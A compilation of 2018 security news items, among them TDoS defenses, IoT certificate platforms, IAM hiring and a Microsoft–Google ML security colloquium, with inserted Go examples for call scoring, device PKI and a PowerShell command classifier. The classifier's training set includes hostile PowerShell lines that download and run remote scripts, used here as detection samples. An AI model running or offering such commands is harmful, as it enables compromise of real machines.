The U.S. Department of Homeland Security has partnered with security firm SecureLogix to develop technology to defend against telephony denial-of-service attacks, which remain a significant threat to emergency call centers, banks, schools and hospitals.
The DHS Science and Technology (S&T) Directorate said this week that it and SecureLogix were making “rapid progress” in developing defenses against call spoofing and robocalls, two techniques criminals use to launch telephony denial-of-service (TDoS) attacks and extort money. Ultimately, S&T’s goal is to “shift the advantage from TDoS attackers to network administrators.”
To that end, S&T and SecureLogix, based in San Antonio, are developing two TDoS attack defenses. First is a mechanism for identifying the voice recording used in call spoofing, followed by a means to separate legitimate emergency calls from robocalls.
“Several corporations, including many banks and DHS components, have expressed interest in this technology, and SecureLogix will release it into the market in the coming months,” William Bryan, interim undersecretary for S&T at DHS, said in a statement.
In 2017, S&T handed SecureLogix a $100,000 research award to develop anti-call-spoofing technology. The company was one of a dozen small tech firms that received similar amounts from S&T to create a variety of security applications.
Filtering out TDoS attack calls
SecureLogix’s technology analyzes and assigns a threat score to each incoming call in real time. Calls with a high score are either terminated or redirected to a lower-priority queue or a third-party call management service.
SecureLogix built its prototype on existing voice security technologies, so it can be deployed in complex voice networks, according to S&T. It also contains a business rules management system and a machine learning engine “that can be extended easily, with limited software modifications.”
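The scoring-and-routing step can be sketched in code. The Go program below is an added example, not SecureLogix’s or DHS S&T’s code: it scores each incoming call from three signals the article mentions (call rate per caller ID, one recording replayed behind many caller IDs, and an implausible caller ID) and maps the score to accept, a low-priority queue, or terminate. The Call record, the audio-fingerprint field and every threshold are assumptions chosen for the demo.

```go
// Added example: a sliding-window call scorer of the kind the article
// describes. Illustrative code, not SecureLogix's or DHS S&T's; the three
// signals and every threshold are assumptions chosen for the demo.
package main

import (
	"fmt"
	"strings"
	"time"
)

// Call is a constructed call record. AudioFP stands in for a fingerprint of the
// call audio computed elsewhere (assumed), so one replayed recording yields the
// same value behind every caller ID it is spoofed behind.
type Call struct {
	At      time.Time
	Caller  string // presented caller ID: spoofable, never trusted on its own
	AudioFP string
}

// Scorer keeps sliding-window state keyed by caller ID and by audio fingerprint.
type Scorer struct {
	Window    time.Duration
	RateLimit int // calls per window from one caller ID before it scores
	FPLimit   int // distinct caller IDs replaying one recording before it scores
	byCaller  map[string][]time.Time
	byFP      map[string]map[string]time.Time // fingerprint -> caller ID -> last seen
}

// validCallerID accepts an optional '+' followed by 10 to 15 digits (E.164-like).
func validCallerID(id string) bool {
	id = strings.TrimPrefix(id, "+")
	return len(id) >= 10 && len(id) <= 15 && strings.Trim(id, "0123456789") == ""
}

// Score records the call and returns an additive threat score (higher is worse).
func (s *Scorer) Score(c Call) int {
	if s.byCaller == nil {
		s.byCaller, s.byFP = map[string][]time.Time{}, map[string]map[string]time.Time{}
	}
	cutoff, score := c.At.Add(-s.Window), 0

	// Signal 1: burst of calls from one caller ID inside the window.
	recent := s.byCaller[c.Caller][:0]
	for _, t := range s.byCaller[c.Caller] {
		if t.After(cutoff) {
			recent = append(recent, t)
		}
	}
	s.byCaller[c.Caller] = append(recent, c.At)
	if n := len(recent) + 1; n > s.RateLimit {
		if score = 50 + 10*(n-s.RateLimit); score > 80 {
			score = 80
		}
	}

	// Signal 2: one recording arriving from many caller IDs, after expiring stale IDs.
	seen := s.byFP[c.AudioFP]
	if seen == nil {
		seen = map[string]time.Time{}
		s.byFP[c.AudioFP] = seen
	}
	for id, t := range seen {
		if !t.After(cutoff) {
			delete(seen, id)
		}
	}
	seen[c.Caller] = c.At
	if len(seen) >= s.FPLimit {
		score += 40
	}

	// Signal 3: a caller ID that cannot be a real subscriber number.
	if !validCallerID(c.Caller) {
		score += 30
	}
	return score
}

// Triage maps a score to what the switch should do with the call.
func Triage(score int) string {
	if score >= 70 {
		return "terminate"
	} else if score >= 40 {
		return "low-priority"
	}
	return "accept"
}

func main() {
	s := &Scorer{Window: 30 * time.Second, RateLimit: 3, FPLimit: 4}
	base := time.Date(2018, 6, 27, 9, 0, 0, 0, time.UTC)
	for i, id := range []string{"+15551231000", "+15551231001", "+15551231002", "+15551231003", "anonymous"} {
		c := Call{At: base.Add(time.Duration(i) * time.Second), Caller: id, AudioFP: "fp-robo"} // same recording, five IDs
		score := s.Score(c)
		fmt.Printf("%s %-13s score=%3d -> %s\n", c.At.Format("15:04:05"), c.Caller, score, Triage(score))
	}
}
```

The fingerprint signal is the one that survives spoofing: caller ID is attacker-controlled, so a per-caller rate limit alone is defeated by rotating numbers, while a recording replayed behind hundreds of numbers still collapses to one key. A deployment in front of a 911 center would also exempt known emergency-service trunks, so that a legitimate surge of calls about one incident is not scored as a flood.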
Over the last year, SecureLogix deployed the prototype within a customer facility, a cloud environment and a service provider network. The vendor also worked with a 911 emergency call center and large financial institutions.
In March 2013, a large-scale TDoS attack highlighted the threat against the telephone systems of public-sector agencies. An alert issued by DHS and the FBI said extortionists had launched dozens of attacks against the administrative telephone lines of air ambulance and ambulance organizations, hospitals and financial institutions.
Today, the need for TDoS protection has grown from on premises to the cloud, where an increasing number of companies and call centers are signing up for unified communications as a service. In 2017, nearly half of organizations surveyed by Nemertes Research were using or planned to use cloud-based UC.
Rival certificate authorities GlobalSign and Comodo CA this week launched competing IoT security platforms designed to improve identity management and authentication of connected devices.
GlobalSign Tuesday unveiled its IoT Identity Platform, which includes several products and services aimed at using public key infrastructure (PKI) to assign identities to IoT devices and authenticate them. The cloud-based platform includes IoT Edge Enroll, an enrollment client that provisions and manages PKI-based identities for an assortment of connected devices. IoT Edge Enroll can authenticate and revoke devices and also includes a device Registration Authority (RA) as well as certificate lifecycle management.
In addition, GlobalSign’s platform features IoT CA Direct, which is an identity issuance engine for device certificates, and IoT CA Connect, which offers third-party application integration for identity and access management products. GlobalSign said the platform uses RESTful APIs for secure connections and claims its PKI service can issue 3,000 certificates per second.
On Thursday, Comodo CA launched IoT PKI Manager, which also applies certificates to connected devices. Comodo’s IoT security platform, which uses a combination of X.509 identity certificates and customized TLS/SSL certificates, offers enterprises Certificate Authority (CA) signing and hosting services as well as a batch issuance system for enrolling and authenticating large batches of certificates.
Comodo’s IoT security platform also offers automatic certificate provisioning as well as certificate lifecycle management services. The company had previously introduced certificate products and services for IoT devices, but Damon Kachur, head of IoT solutions at Comodo CA, said the IoT PKI Manager ties those offerings together into one platform with a single user interface for all certificate accounts as well as new enrollment and management features. The aim, Kachur said, was to make the certificate process for IoT devices as easy as possible.
“The [IoT] industry is a little scared of PKI because companies think it’s a heavy lift,” he said. “It’s not, if you have the right platform. We take all of the auditing and all of the lifecycle management and make it simple.”
Both Comodo and GlobalSign, as well as other certificate authorities, have discussed the growing opportunities around securing and authenticating connected devices and have already made inroads in the IoT security market. PKI certificates can protect connections and data flows between devices and servers as well as enable organizations to revoke the access of compromised devices to their private networks.
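For the mechanics both platforms package up, here is an added example using only Go’s standard library; it is not GlobalSign’s or Comodo CA’s code. A device CA enrolls a device by issuing it a client-authentication certificate, a server verifies the chain when the device connects, and a CA-signed CRL is how a compromised device’s access is revoked. The CA name, lifetimes, the use of CommonName for the device identifier and the one-day CRL validity are assumptions.

```go
// Added example: a minimal device-identity PKI, built on Go's standard library.
// Not GlobalSign's or Comodo CA's code; names and lifetimes are assumptions.
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"time"
)

// newKeyAndCert generates a P-256 key and issues tmpl for it, signed by signer
// under parent (self-signed when parent is nil), with a random 128-bit serial.
func newKeyAndCert(tmpl, parent *x509.Certificate, signer *ecdsa.PrivateKey) (*x509.Certificate, *ecdsa.PrivateKey, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, nil, err
	}
	if tmpl.SerialNumber, err = rand.Int(rand.Reader, new(big.Int).Lsh(big.NewInt(1), 128)); err != nil {
		return nil, nil, err
	}
	tmpl.NotBefore = time.Now().Add(-time.Minute)
	if parent == nil {
		parent, signer = tmpl, key
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, parent, &key.PublicKey, signer)
	if err != nil {
		return nil, nil, err
	}
	cert, err := x509.ParseCertificate(der)
	return cert, key, err
}

// NewDeviceCA creates a self-signed CA limited to signing certificates and CRLs.
func NewDeviceCA() (*x509.Certificate, *ecdsa.PrivateKey, error) {
	return newKeyAndCert(&x509.Certificate{
		Subject:               pkix.Name{CommonName: "Example Device CA"},
		NotAfter:              time.Now().Add(10 * 365 * 24 * time.Hour),
		IsCA:                  true,
		BasicConstraintsValid: true,
		KeyUsage:              x509.KeyUsageCertSign | x509.KeyUsageCRLSign,
	}, nil, nil)
}

// EnrollDevice issues a device a one-year client-auth certificate naming it.
// In real enrollment the key is generated on the device (ideally in a secure
// element) and only a CSR reaches the CA; the CA never holds device keys.
func EnrollDevice(ca *x509.Certificate, caKey *ecdsa.PrivateKey, deviceID string) (*x509.Certificate, *ecdsa.PrivateKey, error) {
	return newKeyAndCert(&x509.Certificate{
		Subject:     pkix.Name{CommonName: deviceID},
		NotAfter:    time.Now().Add(365 * 24 * time.Hour),
		KeyUsage:    x509.KeyUsageDigitalSignature,
		ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth},
	}, ca, caKey)
}

// IssueCRL signs a one-day CRL listing the given certificates as revoked.
func IssueCRL(ca *x509.Certificate, caKey *ecdsa.PrivateKey, revoked ...*x509.Certificate) ([]byte, error) {
	now := time.Now()
	tmpl := &x509.RevocationList{Number: big.NewInt(now.Unix()), ThisUpdate: now, NextUpdate: now.Add(24 * time.Hour)}
	for _, c := range revoked {
		tmpl.RevokedCertificates = append(tmpl.RevokedCertificates,
			pkix.RevokedCertificate{SerialNumber: c.SerialNumber, RevocationTime: now})
	}
	return x509.CreateRevocationList(rand.Reader, tmpl, ca, caKey)
}

// VerifyDevice is the relying party's check when a device presents cert: chain
// to the device CA, then refuse revoked devices using a fresh, CA-signed CRL.
func VerifyDevice(ca, cert *x509.Certificate, crlDER []byte) error {
	roots := x509.NewCertPool()
	roots.AddCert(ca)
	if _, err := cert.Verify(x509.VerifyOptions{Roots: roots, KeyUsages: []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth}}); err != nil {
		return fmt.Errorf("chain: %w", err)
	}
	crl, err := x509.ParseRevocationList(crlDER)
	if err == nil {
		err = crl.CheckSignatureFrom(ca) // only a CRL our CA signed counts
	}
	if err != nil {
		return fmt.Errorf("crl: %w", err)
	}
	if time.Now().After(crl.NextUpdate) {
		return fmt.Errorf("crl stale since %s; failing closed", crl.NextUpdate)
	}
	for _, rc := range crl.RevokedCertificates {
		if rc.SerialNumber.Cmp(cert.SerialNumber) == 0 {
			return fmt.Errorf("device %q is revoked", cert.Subject.CommonName)
		}
	}
	return nil
}

func main() {
	ca, caKey, _ := NewDeviceCA()
	dev, _, _ := EnrollDevice(ca, caKey, "sensor-0001")
	crl, _ := IssueCRL(ca, caKey, dev) // revoke it straight away for the demo
	fmt.Println(VerifyDevice(ca, dev, crl))
}
```

Two checks in VerifyDevice matter beyond the chain itself: the CRL must carry the CA’s signature (otherwise anyone on the path could serve an empty one) and must not be past NextUpdate, so stale revocation data fails closed rather than open. The batch issuance and lifecycle management the vendors describe sit around exactly these calls at fleet scale. Requires Go 1.19 or later for x509.ParseRevocationList.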
BOSTON — As identity and access management become more critical to security strategies, organizations must be on the lookout for good identity engineers — and there are a few different ways IT can approach this staffing.
Identity and access management (IAM) is increasingly essential as mobile devices add new access points for employees and fresh ways to leak corporate data. But the job market still lacks skilled IAM engineer candidates, so organizations may be better off training existing IT staff or hiring general security engineers to educate on IAM expertise, experts said here at this week’s Identiverse conference.
“Focus on general IT skills and roles [when you] hire engineers,” said Olaf Grewe, director of access certification services at Deutsche Bank, in a session. “Don’t wait for this elusive candidate that has all of this baked in. Bring them up to where you need to be.”
IAM job market landscape
Job growth in IAM has surged in the past year, with about 1,500 IAM engineer openings currently in the Boston area, 4,800 in the D.C. area and 3,320 in Silicon Valley, according to a presentation by Dave Shields, a senior security architect for IAM at DST Systems, a financial technology company in Kansas City.
“It is finally reaching a state where people see that it’s a viable place to have [a career],” said Shields, who was also recently the managing director of IT and ran IAM at the University of Oklahoma. “There are so many things you can do with it.”
There aren’t enough people already skilled in IAM to fill these roles, however, and those who are may not live nearby. Instead, IT departments can train up existing staff on IAM — but the key is to choose the right people.
“The best engineers you’re going to find are the people who aren’t afraid to break stuff,” Shields said. “Maybe you have a sysadmin who gets into systems and was able to make them do things they were never able to do before. Talk to that person.”
The person should also be flexible, adaptable to change and willing to ask questions others don’t want to hear, he said. Other desirable qualities for an IAM engineer are creativity and an ability to understand the business’ functions and the technology in use.
“Find someone who can look at something and say, ‘I can make that better,'” Shields said. “There are some things that simply cannot be taught.”
IAM and security go hand in hand
Deutsche Bank is currently building up an IAM team that includes existing IT staff and external hires, which the company then trains on IAM skills. That involves four major steps: baseline IAM training, then vendor-specific education, then CISSP, followed by continuous learning over time via conferences, lunch and learns, and updated vendor training.
“We need to make sure people have access to the right resources,” Grewe said. “We want to have people who are continuously developing.”
General security skills are especially important for IAM engineer candidates, experts said. Sarah Squire, a senior technical architect at Ping Identity, started out by learning the important security specs and standards as a way toward training up on identity management.
“It’s a lot of on-the-job training,” Squire said. “We’re starting to realize that we really need a base body of knowledge for the entire field.”
For that reason, Squire along with Ian Glazer, vice president for identity product management at Salesforce, founded IDPro, a community for IAM professionals. Launched at last year’s Identiverse (then Cloud Identity Summit), IDPro is currently forming the body of knowledge that an IAM engineer must know, and plans to offer a certification in the future, Squire said.
“It’s really important that people who come in not only understand IAM but also really understand security,” Grewe said.
It’s also important to determine where within the organization those IAM professionals will live. Is it operations? Development? Security?
“A lot of people just don’t know where that fits,” Shields said. “There is nowhere better for them to be in my opinion than on the IT security team.”
Grewe’s team at Deutsche Bank, for instance, works under the chief security officer, which has a lot of budget to work with, he said. At IBM, the team that handles internal identity management works closely with HR and other groups that are involved in employees’ access rights, said Heather Hinton, vice president and chief information security officer for IBM Hybrid Cloud.
“[Organizations] need to figure out how to be less siloed,” she said.
BOSTON — Enterprise security teams’ zero-trust mindset is often a good thing. But when it comes to cloud services adoption, Microsoft argued it may be doing more harm than good.
During her session this week at the 2018 Identiverse conference, “The Cake is Not a Lie,” Laura Hunter, principal program manager at Microsoft, said security professionals need to change their default reactions when their organizations want to introduce new cloud applications. She said she finds security professionals go through something similar to the five stages of grief when their organization begins the process of cloud services adoption.
“I put a portion of the blame at the feet of the cloud service provider,” Hunter said regarding why the reactions are so intense. “When [cloud service providers] talk to our customers, we maybe, historically, lay it on a little thick” and promise perfectly secured cloud environments.
The bigger problem, she noted, is security professionals are naturally predisposed to be skeptical of anything “new and shiny,” like the perfectly secured cloud environments.
“It’s in our nature, as security professionals, when we hear the stories of happy, shiny, flowers and goodness, to immediately go ‘shields up,'” she said. “In some ways, this is good. But, in some ways, it can actually work to our detriment.”
According to Hunter, security professionals work in a zero-trust mindset, especially when it comes to cloud services adoption. As a result, when another unit in the organization proposes using a cloud application or service, security professionals have an automatic answer of “no,” because it would be bad for security.
However, if the IT department says no to a service that a business department or employee needs to do their job effectively, that business department or employee will most likely go out and procure the service on their own anyway.
Because of this, Hunter questioned the zero-trust mindset of security professionals.
“Is this default answer of ‘Trust no one’… really acting in our organization’s best interest?” she asked.
By maintaining a “hard-line no” as the default answer every time cloud services adoption is brought up, “we are removing ourselves from the conversation,” Hunter said. “We are removing ourselves from conversations our businesses are having whether we want them to or not.”
When it comes down to business need versus security, business need is always going to win, she said, and then you end up with shadow cloud IT that the security team has no control over.
“It’s going to happen anyway, and the only thing you’ve done by maintaining that hard-line approach is ensure that it happens without you at the table, ensure that it’s happening without you as part of the conversation” about how to monitor the cloud applications, apply controls and policies, and maintain organizational compliance, she said.
“Maintaining that ‘hard-line no’ is actually making your organization less secure,” Hunter said.
Security professionals should instead remain open-minded and “have a conversation that’s a question,” rather than always saying no. The solution is to embrace the use of cloud applications in the enterprise and work to find ways to make them more secure. Better yet, use the cloud services to improve enterprise security.
“Let’s use the cloud for the good of our organization.”
BOSTON — Ping Identity is moving beyond single sign-on and further into API security with its latest acquisition.
At the Identiverse 2018 conference on Tuesday, the Denver-based identity and access management (IAM) provider announced the acquisition of Elastic Beam, a Redwood City, Calif., cybersecurity startup that uses artificial intelligence to monitor and protect APIs. Terms of the deal were not disclosed.
Elastic Beam, which was founded in 2014, will become part of Ping’s new API protection offering, dubbed PingIntelligence for APIs. Elastic Beam’s API Behavioral Security (ABS) automatically discovers an organization’s APIs and monitors the activity using AI-driven behavioral analysis.
“The moment it detects abnormal activity on an API, it automatically blocks that API,” said Bernard Harguindeguy, founder of Elastic Beam.
Harguindeguy, who joined Ping as its new senior vice president of intelligence, said ABS’ use of AI is ideal for API monitoring and defense, because there are simply too many APIs and too much data around them for human security professionals to effectively track and analyze on their own.
“API security is a very hard problem. You cannot rely on roles and policies and attacker patterns,” he said. “We had to use AI in a very smart way.”
Ping Identity CEO Andre Durand said the explosion of APIs in both cloud services and mobile applications has expanded the attack surface for enterprises and demanded a new approach to managing and securing APIs. While Durand acknowledged the potential for AI systems to make mistakes, he said improving API protection can’t be done without the help of machine learning and AI technology.
“We’re in the early stages of applying AI to the enormity of traffic that we have access to today,” he said. “We want to limit the space and time that users have access to, but there’s no policy that can do that. I don’t think there’s a way to have that breakthrough without machine learning, big data and AI.”
PingIntelligence for APIs is currently in private preview, and it will be generally available in the third quarter this year.
Silver Peak boosted its software-defined WAN security for cloud-based workloads with the introduction of three security partners.
Silver Peak Unity EdgeConnect customers can now add security capabilities from Forcepoint, McAfee and Symantec for layered security in their Silver Peak SD-WAN infrastructure, the vendor said in a statement. The three security newcomers join existing Silver Peak partners Check Point, Fortinet, OPAQ Networks, Palo Alto Networks and Zscaler.
Silver Peak SD-WAN allows customers to filter application traffic that travels to and from cloud-based workloads through security processes from third-party security partners. Customers can insert virtual network functions (VNFs) through service chaining wherever they need the capabilities, which can include traffic inspection and verification, distributed denial-of-service protection and next-generation firewalls.
These partnership additions build on Silver Peak’s recent update to incorporate a drag-and-drop interface for service chaining and enhanced segmentation capabilities. For example, Silver Peak said a typical process starts with customers defining templates for security policies that specify segments for users and applications. This segmentation can be created based on users, applications or WAN services — all within Silver Peak SD-WAN’s Unity Orchestrator.
Once the template is complete, Silver Peak SD-WAN launches and applies the security policies for those segments. These policies can include configurations for traffic steering, so specific traffic automatically travels through certain security VNFs, for example. Additionally, Silver Peak said customers can create failover procedures and policies for user access.
Enterprises are increasingly moving their workloads to public cloud and SaaS environments, such as Salesforce or Microsoft Office 365. Securing that traffic — especially traffic that travels directly over broadband internet connections — remains top of mind for IT teams, however. By service chaining security functions from third-party security companies, Silver Peak SD-WAN customers can access those applications more securely, the company said.
Silver Peak SD-WAN holds 12% of the $162 million SD-WAN market, according to a recent IHS Markit report, which ranks the vendor third after VMware-VeloCloud and Aryaka.
ONF pinpoints four technology areas to develop
The Open Networking Foundation unveiled four new supply chain partners that are working to develop technology reference designs based on ONF’s strategic plan. Along with the four partners — Adtran, Dell EMC, Edgecore Networks and Juniper Networks — ONF finalized the focus areas for the initial reference designs.
ONF’s reference designs provide blueprints to follow while building open source platforms that use multiple components, the foundation said in a statement. While the broad focus for these blueprints looks at edge cloud, ONF targeted four specific technology areas:
Network functions virtualization fabric. This blueprint develops work on leaf-spine data center fabric for edge applications.
Unified programmable and automated network. ONF touts this as a next-generation SDN reference design that uses the P4 language for data plane programmability.
Open disaggregated transport network. This reference design focuses on open multivendor optical networks.
Adtran, Dell EMC, Edgecore and Juniper each applies its own technology expertise to these reference design projects, ONF said. Additionally, as supply chain partners, they’ll aid operators in assembling deployment environments based on the reference designs.
REDMOND, Wash. — At first glance, the gathering inside Building 99 at Microsoft this week looked like many others inside the company, as technical experts shared hard-earned lessons for using machine learning to defend against hackers.
It looked normal, that is, until you spotted the person in the blue Google shirt addressing the group, next to speakers from Salesforce, Netflix and Microsoft, at a day-long event that included representatives of Facebook, Amazon and other big cloud providers and services that would normally treat technical insights as closely guarded secrets.
As the afternoon session ended, the organizer from Microsoft, security data wrangler Ram Shankar Siva Kumar, complimented panelist Erik Bloch, the Salesforce security products and program management director, for “really channeling the Ohana spirit,” referencing the Hawaiian word for “family,” which Salesforce uses to describe its internal culture of looking out for one another.
Siva Kumar then gave attendees advice on finding the location of the closing reception. “You can Bing it, Google it, whatever it is,” he said, as the audience laughed at the rare concession to Microsoft’s longtime competitor.
It was no ordinary gathering at Microsoft, but then again, it’s no ordinary time in tech. The Security Data Science Colloquium brought the competitors together to focus on one of the biggest challenges and opportunities in the industry.
Machine learning, one of the key ingredients of artificial intelligence, is giving the companies new superpowers to identify and guard against malicious attacks on their increasingly cloud-oriented products and services. The problem is that hackers are using many of the same techniques to take those attacks to a new level.
“The challenge is that security is a very asymmetric game,” said Dawn Song, a UC Berkeley computer science and engineering professor who attended the event. “Defenders have to defend across the board, and attackers only need to find one hole. So in general, it’s easier for attackers to leverage these new techniques.”
That helps to explain why the competitors are teaming up.
“At this point in the development of this technology it’s really critical for us to move at speed to all collaborate,” explained Mark Russinovich, the Microsoft Azure chief technology officer. “A customer of Google is also likely a customer of Microsoft, and it does nobody any good or gives anybody a competitive disadvantage to keep somebody else’s customer, which could be our own customer, insecure. This is for the betterment of everybody, the whole community.”
This spirit of collaboration is naturally more common in the security community than in the business world, but the colloquium at Microsoft has taken it to another level. GeekWire is the first media organization to go inside the event, although some presentations weren’t opened up to us, due in part to the sensitive nature of some of the information the companies shared.
The event, in its second year, grew out of informal gatherings between Microsoft and Google, which resulted in part from connections Siva Kumar made on long-distance runs with Google’s tech security experts. After getting approval from his manager, he brought one of the Google engineers to Microsoft two years ago to compare notes with his team.
Things have snowballed from there. After the first event, last year, Siva Kumar posted about the colloquium, describing it as a gathering of “security data scientists without borders.” As the word got out, additional companies asked to be involved, and Microsoft says this year’s event was attended by representatives of 17 different tech companies in addition to university researchers.
The event reflects a change in Microsoft’s culture under CEO Satya Nadella, as well as a shift in the overall industry’s approach. Of course, the companies are still business rivals that compete on the basis of beating each other’s products. But in years or decades past, many treated security as a competitive advantage, as well. That’s what has changed.
“This is not a competing thing. This is not about us trying to one up each other,” Siva Kumar said. “It just feels like, year over year, our problems are just becoming more and more similar.”
In one afternoon session this week, representatives from Netflix, one of Amazon Web Services’ marquee customers, gave detailed briefings on the streaming service’s internal machine learning tools, including its “Trainman” system for detecting and reporting unusual user activity.
Developing and improving the system has been a “humbling journey,” said Siamac Mirzaie from the Netflix Science & Analytics Team, before doing a deep dive on the technical aspects of Trainman.
Depending on the situation, he said, Netflix uses either Python, Apache Spark or Flink to bring the data into its system and append the necessary attributes to the data. It then uses simple rules, statistical models and machine learning models to detect anomalies using Flink or Spark, followed by a post-processing layer that uses a combination of Spark and Node.js. That’s followed by a program for visualizing the anomalies in a timeline that people inside the company can use to drill down into and understand specific events.
“The idea is to refine the various data anomalies that we’ve generated in the previous stage into anomalies that our application owner or security analyst can actually relate to,” Mirzaie said.
The stakes are high given the $8 billion that Netflix is expected to spend on content this year.
But the stakes might be even higher for Facebook. The social network, which has been in the international spotlight over misuse of its platform by outside companies and groups, says it uses a combination of automated and manual systems to identify fraudulent and suspicious activity.
During his keynote, Microsoft’s Russinovich talked in detail about Windows PowerShell, the command-line shell and scripting language that is a popular tool for attackers in part because it’s built into the operating system. Microsoft’s Windows Defender Advanced Threat Protection is designed to detect suspicious command lines, and Microsoft was previously using a traditional model trained to recognize potentially malicious sequences of characters.
“That only got us so far,” Russinovich said in an interview.
After brainstorming ways to solve the problem, the company’s security defense researchers figured out how to apply deep neural networks, more commonly used in vision-based object detection, for use in PowerShell malicious script detection, as well. They essentially came up with a way to encode command lines to make them look like images to the machine learning model, Russinovich explained. The result surpassed the traditional technique “by a significant amount,” he said.
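Russinovich’s “traditional model” trained on sequences of characters can be made concrete. The Go program below is an added example, not Microsoft’s code: a multinomial naive Bayes classifier over character trigrams, trained on a small constructed set of labelled PowerShell command lines (the IP addresses are documentation ranges and the encoded commands are made up) and then asked to label unseen lines.

```go
// Added example (not Microsoft's code): a naive Bayes classifier over character
// trigrams, the kind of "traditional model" the page says preceded Microsoft's
// deep network. Training lines, labels and IPs (documentation ranges) are constructed.
package main

import (
	"fmt"
	"math"
	"strings"
)

// Classifier is a multinomial naive Bayes model over lower-cased character trigrams.
type Classifier struct {
	counts map[string]map[string]int // label -> trigram -> occurrences
	total  map[string]int            // label -> trigrams seen
	docs   map[string]int            // label -> lines seen
	nDocs  int
	vocab  map[string]bool
}

// grams slides a three-rune window over the lower-cased, trimmed line.
func grams(line string) []string {
	r := []rune(strings.ToLower(strings.TrimSpace(line)))
	out := make([]string, 0, len(r))
	for i := 0; i+3 <= len(r); i++ {
		out = append(out, string(r[i:i+3]))
	}
	return out
}

// Train adds one labelled command line to the model.
func (c *Classifier) Train(label, line string) {
	if c.counts[label] == nil {
		c.counts[label] = map[string]int{}
	}
	for _, g := range grams(line) {
		c.counts[label][g]++
		c.total[label]++
		c.vocab[g] = true
	}
	c.docs[label]++
	c.nDocs++
}

// Scores returns each label's log posterior (up to a constant) for line, with
// add-one smoothing so a trigram unseen under a label does not zero it out.
func (c *Classifier) Scores(line string) map[string]float64 {
	gs, out := grams(line), map[string]float64{}
	for label, cnt := range c.counts {
		score := math.Log(float64(c.docs[label]) / float64(c.nDocs))
		denom := float64(c.total[label] + len(c.vocab))
		for _, g := range gs {
			score += math.Log(float64(cnt[g]+1) / denom)
		}
		out[label] = score
	}
	return out
}

// Classify returns the label with the highest score.
func (c *Classifier) Classify(line string) (best string) {
	bestScore := math.Inf(-1)
	for label, s := range c.Scores(line) {
		if s > bestScore {
			best, bestScore = label, s
		}
	}
	return best
}

// TrainedOnSamples builds the model from a small constructed corpus.
func TrainedOnSamples() *Classifier {
	c := &Classifier{counts: map[string]map[string]int{}, total: map[string]int{},
		docs: map[string]int{}, vocab: map[string]bool{}}
	for label, lines := range map[string][]string{
		"malicious": {
			`powershell -nop -w hidden -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA`,
			`powershell.exe -NoProfile -ExecutionPolicy Bypass -Command IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')`,
			`powershell -w hidden -nop -c "IEX ((New-Object Net.WebClient).DownloadString('http://203.0.113.9/x'))"`,
			`cmd /c powershell -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA`,
		},
		"benign": {
			`powershell.exe -File C:\scripts\backup.ps1`,
			`powershell Get-Service -Name wuauserv`,
			`powershell.exe -NoProfile -Command Get-ChildItem C:\Users`,
			`powershell -Command Import-Module ActiveDirectory; Get-ADUser -Filter *`,
			`powershell.exe -ExecutionPolicy RemoteSigned -File C:\deploy\install.ps1`,
		},
	} {
		for _, l := range lines {
			c.Train(label, l)
		}
	}
	return c
}

func main() {
	c := TrainedOnSamples()
	fmt.Println(c.Classify(`powershell -w hidden -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA`), c.Classify(`powershell Get-Service -Name bits`))
}
```

The model keys on substrings such as `-enc`, `hidden`, `-nop` and runs of base64, which is why it works on these samples and also why it “only got so far”: attackers split, case-shift or quote those tokens apart, and a bag of trigrams has no notion of the command’s structure. That is the gap the image-style encoding and deep network described above are meant to close.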
At the closing panel discussion, David Seidman, Google security engineering manager, summed up the stated philosophy of the event. “We are not trying to compete on the basis of our corporate security,” Seidman said. “Google is not trying to get ahead of Microsoft in the cloud because Microsoft got compromised. That’s the last thing we want to see.”
“We are fighting common enemies,” Seidman added. “The same attackers are coming after all of us, and an incident at one company is going to affect that customer’s trust in all the cloud companies they do business with. So we have very much aligned interests here.”
Cloud security isn’t for the squeamish. Protecting cloud-based workloads and designing a hybrid cloud security architecture has become a more difficult challenge than first envisioned, said Jon Oltsik, an analyst at Enterprise Strategy Group in Milford, Mass.
“The goal was simple,” he said. Enterprises wanted the same security they had for their internal workloads to be extended to the cloud.
But using existing security apps didn’t work out so well. In response, enterprises tried to concoct their own, but that meant the majority of companies had separate security foundations for their on-premises and cloud workloads, Oltsik said.
The answer in creating a robust hybrid cloud security architecture is central policy management, where all workloads are tracked, policies and rules applied and networking components displayed in a centralized console. Firewall and security vendors are beginning to roll out products supporting this strategy, Oltsik said, but it’s still incumbent upon CISOs to proceed carefully.
“The move to central network security policy management is a virtual certainty, but which vendors win or lose in this transition remains to be seen.”
Dennis Drogseth, an analyst at Enterprise Management Associates in Boulder, Colo., described the metamorphosis of UEM (user experience management), debunking the notion that the methodology is merely a subset of application performance management.
Instead, Drogseth said, UEM is multifaceted, encompassing application performance, business impact, change management, design, user productivity and service usage.
According to EMA research, over the last three years the two most important areas for UEM have been application performance and portfolio planning and optimization. UEM can provide valuable insights to both IT and the business.
One question surrounding UEM is whether it falls into the realm of IT or business. In years past EMA data suggested 20% of networking staffers considered UEM a business concern, 21% an IT concern and 59% said UEM should be equally an IT and business concern. Drogseth agreed wholeheartedly with the latter group.
Drogseth expanded on the usefulness of UEM in his blog, including how UEM is important to DevOps and creating an integrated business strategy.
Mixed LPWAN results, but future could be bright
GlobalData analyst Kitty Weldon examined the evolving low-power WAN market in the wake of the 2018 annual conference in London.
Mobile operators built out their networks for LPWAN in 2017, Weldon said, and are now starting to look for action. Essentially every internet of things (IoT) service hopped on the LPWAN bandwagon; now they await the results.
So far, there have been 48 launches by 26 operators.
The expectation remains that lower costs and improved battery life will eventually bring thousands of new low-bandwidth IoT devices onto LPWANs. However, Weldon notes that it’s still the beginning of the LPWAN era, and right now feelings are mixed.
“Clearly, there is some concern in the industry that the anticipated massive uptake of LPWANs will not be realized as easily as they had hoped, but the rollouts continue and optimism remains, tempered with realistic concerns about how best to monetize the investments.”
